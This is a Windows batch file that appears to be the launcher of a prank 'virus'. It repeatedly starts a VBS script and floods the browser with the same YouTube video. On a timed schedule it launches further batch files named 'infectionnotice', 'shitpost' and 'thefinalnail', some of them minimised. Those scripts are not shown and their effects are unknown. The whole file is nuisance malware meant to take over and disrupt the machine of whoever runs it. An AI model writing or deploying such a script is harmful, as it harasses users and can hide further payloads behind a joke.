@echo off
start shittyvbs1.vbs
timeout 10
start www.youtube.com/watch?v=vExMh951NUQ&pp=ygUhc3BydW5raSBneWF0dCBzb25nIGJlbmppeHNjYXJsZXR0
timeout 0.25
start shittyvbs1.vbs
start www.youtube.com/watch?v=vExMh951NUQ&pp=ygUhc3BydW5raSBneWF0dCBzb25nIGJlbmppeHNjYXJsZXR0
timeout 0.25
start shittyvbs1.vbs
start www.youtube.com/watch?v=vExMh951NUQ&pp=ygUhc3BydW5raSBneWF0dCBzb25nIGJlbmppeHNjYXJsZXR0
timeout 0.25
start shittyvbs1.vbs
start www.youtube.com/watch?v=vExMh951NUQ&pp=ygUhc3BydW5raSBneWF0dCBzb25nIGJlbmppeHNjYXJsZXR0
timeout 0.25
start shittyvbs1.vbs
start www.youtube.com/watch?v=vExMh951NUQ&pp=ygUhc3BydW5raSBneWF0dCBzb25nIGJlbmppeHNjYXJsZXR0
timeout 0.25
start shittyvbs1.vbs
start www.youtube.com/watch?v=vExMh951NUQ&pp=ygUhc3BydW5raSBneWF0dCBzb25nIGJlbmppeHNjYXJsZXR0
timeout 0.25
start shittyvbs1.vbs
start www.youtube.com/watch?v=vExMh951NUQ&pp=ygUhc3BydW5raSBneWF0dCBzb25nIGJlbmppeHNjYXJsZXR0
timeout 0.25
start shittyvbs1.vbs
start www.youtube.com/watch?v=vExMh951NUQ&pp=ygUhc3BydW5raSBneWF0dCBzb25nIGJlbmppeHNjYXJsZXR0
timeout 0.25
start shittyvbs1.vbs
start www.youtube.com/watch?v=vExMh951NUQ&pp=ygUhc3BydW5raSBneWF0dCBzb25nIGJlbmppeHNjYXJsZXR0
timeout 0.25
start shittyvbs1.vbs
start www.youtube.com/watch?v=vExMh951NUQ&pp=ygUhc3BydW5raSBneWF0dCBzb25nIGJlbmppeHNjYXJsZXR0
timeout 3
start shittyvbs1.vbs
start infectionnotice.bat
timeout 10
start shittyvbs1.vbs
start kyssongstarter.bat
timeout 15
start /min shitpost.bat
start shittyvbs1.vbs
timeout 5
start www.youtube.com/watch?v=JE37e1eK2mY
start shittyvbs1.vbs
timeout 54
start shittyvbs1.vbs
timeout 50
start shittyvbs1.vbs
timeout 50
start shittyvbs1.vbs
timeout 50
start shittyvbs1.vbs
timeout 50
start shittyvbs1.vbs
timeout 50
start shittyvbs1.vbs
timeout 50
start shittyvbs1.vbs
timeout 50
start shittyvbs1.vbs
timeout 50
start shittyvbs1.vbs
timeout 50
start shittyvbs1.vbs
timeout 50
start shittyvbs1.vbs
timeout 36
start /min thefinalnail.bat
